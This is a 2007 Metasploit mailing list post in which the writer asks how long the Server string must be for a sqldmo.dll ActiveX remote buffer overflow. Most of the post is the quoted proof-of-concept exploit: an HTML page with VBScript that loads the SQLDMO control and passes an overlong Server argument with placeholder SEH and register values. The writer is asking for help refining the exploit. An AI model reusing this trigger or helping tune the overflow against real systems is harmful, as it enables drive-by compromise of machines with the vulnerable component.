Metasploit mailing list archives
Microsoft SQL Server Distributed Management Objects OLE DLL
From: manish.gupta at ariosesoftware.com (Manish Gupta)
Date: Fri, 14 Sep 2007 09:17:40 +0530
Hi I want to know the server string length of Microsoft SQL Server Distributed Management Objects OLE DLL which has been published on 7th of Sept. 2007 . Am working on "Microsoft SQL Server Distributed Management Objects OLE DLL for SQL Enterprise Manager (sqldmo.dll) remote buffer overflow" on this vulnerability whose exploit is <html> <object classid='clsid:10020200-E260-11CF-AE68-00AA004A34D5' id='SQLServer' /></object> <script language='vbscript'> targetFile = "C:\Programmi\Microsoft SQL Server\80\Tools\Binn\sqldmo.dll" prototype = "Sub Start ( ByVal StartMode As Boolean , [ ByVal Server As Variant ] , [ ByVal Login As Variant ] , [ ByVal Password As Variant ] )" memberName = "Start" progid = "SQLDMO.SQLServer" argCount = 4 'edx = ecx edx ="bb" seh ="aa" StartMode =True Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" Login ="aaaaaaaa" Password ="bbbbbbbb" SQLServer.Start StartMode ,Server ,Login ,Password </script> </html> I am not able to find the server length so please help me. Server ="http://ZZZZ\YYYY\XXXX\WW?W\VVVV\AAAA\AAA\AAAAA\AAAA\AA at AA\tes\test\test\te s.\ttest\MMMM\LLLL\KKK\JJJJ\IIII\HH.H\GGGGG\FFFF\EEEE\DDD\CCCC\BBBB\AAA\A\\\ \\\\\\:#$%AAAA\BBBB\CCCC\DD?D\EEEE\FFFF\GGG\\:#$%\HHHHH\IIII\te at st\tes\test\ test\tes.aaaabbbbccccddddeeeeffffgggghhhhiiiiaaaaaaa" + seh + "CCDmmm" + edx + "nnnBBBB\AAAA\ZZZ\Z\\\\\\\\\:#$%YYYY\XXXX\WWWW\VV?V\UUUU\TTTT\SSS\\:#$%\RRRR R\QQQQ\PP at PP\OOO\NNNN\MMMM\LLL.\KKKKK\JJJJ\IIII\HHH\GGGG\FFFF\EE.E\DDDDD\CCC C\BBBB\AAA\AAAA\AAAA\AAA\A\\\\\\\\\:#$%AAAA\AAAA\AAAA\AA?A\wwww\vvvv\uuu\\:# $%\ttttt\ssss\rr at rr\qqq\pppp\oooo\nnn.\mmmmm\llll\kkkk\jjj\iiii\hhhh\gg.g\ff fff\eeee\dddd\ccc\bbbb\aaaa\AAA\A\\\\\\\" \\ Regards Manish Gupta Ariose Software Noida (U.P) Mbl:-+91-9891650667 -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070914/e3016c24/attachment.htm>
Current thread:
- Microsoft SQL Server Distributed Management Objects OLE DLL Manish Gupta (Sep 13)
- <Possible follow-ups>
- Microsoft SQL Server Distributed Management Objects OLE DLL Manish Gupta (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL H D Moore (Sep 13)
- Microsoft SQL Server Distributed Management Objects OLE DLL Manish Gupta (Sep 14)
- Microsoft SQL Server Distributed Management Objects OLE DLL Manish Gupta (Sep 14)